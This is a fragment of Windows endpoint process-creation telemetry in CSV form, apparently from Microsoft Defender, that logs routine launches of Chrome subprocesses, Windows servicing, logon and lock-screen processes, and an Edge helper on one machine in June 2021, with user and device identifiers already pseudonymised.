+903,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.958733500+00:00,13488,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.960923100+00:00,2021-06-24 11:01:03.769447600+00:00,7106c4e7-eed7-4f28-a889-c03dc77294e6,computerpii_0a470890c60768167990033d701e7bd881398861,179446,False,10.7740.19041.1052,False,11540474045177854,,11540474045177873,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+904,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:30.974422800+00:00,18568,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.961787600+00:00,2021-06-24 11:01:03.769480500+00:00,7e39535c-0ae0-490f-9209-b0d6e7ce6be6,computerpii_0a470890c60768167990033d701e7bd881398861,179447,False,10.7740.19041.1052,False,11540474045177854,,11540474045177874,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+905,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:31.238824300+00:00,7100,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:31.989478100+00:00,2021-06-24 11:01:03.769513900+00:00,02d83c79-a207-4eed-907b-eca9c960ae4e,computerpii_0a470890c60768167990033d701e7bd881398861,179448,False,10.7740.19041.1052,False,11540474045177854,,11540474045177876,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,1.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+906,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:33.787499500+00:00,12100,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:33.796753200+00:00,2021-06-24 11:01:03.769645600+00:00,2ae01ba5-ae5d-491f-89e4-250d7e7d88ed,computerpii_0a470890c60768167990033d701e7bd881398861,179452,False,10.7740.19041.1052,False,11540474045177854,,11540474045177881,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,chrome.exe,10072,256,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+907,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:35.187028300+00:00,9792,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:35.298468+00:00,2021-06-24 11:01:03.769811100+00:00,7147e38f-801e-4a25-a21d-0e4d55c56ecb,computerpii_0a470890c60768167990033d701e7bd881398861,179458,False,10.7740.19041.1052,False,11540474045177854,,11540474045177882,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+908,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:38.486168400+00:00,14560,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3092 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:38.502235700+00:00,2021-06-24 11:01:03.770146300+00:00,11917634-39fd-4741-87f2-87f8b5662fef,computerpii_0a470890c60768167990033d701e7bd881398861,179468,False,10.7740.19041.1052,False,11540474045177854,,11540474045177887,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+909,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:08:28.011640300+00:00,5904,TrustedInstaller.exe,TrustedInstaller.exe,PortableExecutable,2021-02-17 04:35:16.767474300+00:00,C:\Windows\servicing\TrustedInstaller.exe,156480,00c358b55509eaae79292d8e61fc317e,3759ab1b549f440d6769f9bddf38a5562b0ab938b93a1cd172befaf133963ede,642c216e51f8999629deba18dab857efa2b892ec,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:08:28.019639500+00:00,2021-06-25 01:10:47.103236600+00:00,459b183c-9e17-444e-a56c-f14a2404909a,computerpii_0a470890c60768167990033d701e7bd881398861,182637,False,10.7740.19041.1052,False,11540474045136906,,11540474045178627,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.789,TrustedInstaller.exe,TrustedInstaller.exe,Windows Modules Installer
+910,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:08:28.033342+00:00,3604,TiWorker.exe,TiWorker.exe -Embedding,PortableExecutable,2021-06-09 01:15:48.791212900+00:00,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,239432,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:08:29.036781+00:00,2021-06-25 01:10:47.103517300+00:00,69a26004-ea9c-43fa-8511-a53ca2b46f00,computerpii_0a470890c60768167990033d701e7bd881398861,182640,False,10.7740.19041.1052,False,11540474045136908,,11540474045178628,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker
+911,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:09:38.085729300+00:00,10000,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xb2888055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:50:09.647766100+00:00,14008,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 11:50:09.489133800+00:00,17800,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:09:38.155671500+00:00,2021-06-25 01:10:47.179343700+00:00,cc868912-42b3-4561-9b4f-7fcde9537193,computerpii_0a470890c60768167990033d701e7bd881398861,182973,False,10.7740.19041.1052,False,11540474045178088,,11540474045178638,2021-06-24 11:50:09.647766100+00:00,14008,2021-06-24 11:50:09.647766100+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,14008,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 11:50:09.650809300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+912,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:09:38.216652700+00:00,4992,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9528 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:09:38.272939800+00:00,2021-06-25 01:10:47.179505900+00:00,8f27d72b-9ba3-4f97-8150-51d0d0185348,computerpii_0a470890c60768167990033d701e7bd881398861,182975,False,10.7740.19041.1052,False,11540474045178212,,11540474045178639,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+913,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:09:38.241051+00:00,18804,LockApp.exe,"""LockApp.exe"" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca",PortableExecutable,2021-03-11 01:06:58.463741900+00:00,C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe,3596624,82ec40c983294188d3f48189a764af98,38c35262feae1964a324cd17cfb6053afaa025faf591f3dbb34d3d518d6d2cc5,fa53852b8b0f8feb393f3e22b2ec52699016a599,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:09:38.279009700+00:00,2021-06-25 01:10:47.179679900+00:00,43043524-9f0f-40d9-acf9-94d98ebb4141,computerpii_0a470890c60768167990033d701e7bd881398861,182977,False,10.7740.19041.1052,False,11540474045136908,,11540474045178641,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,LockApp.exe,LockApp.exe,LockApp.exe
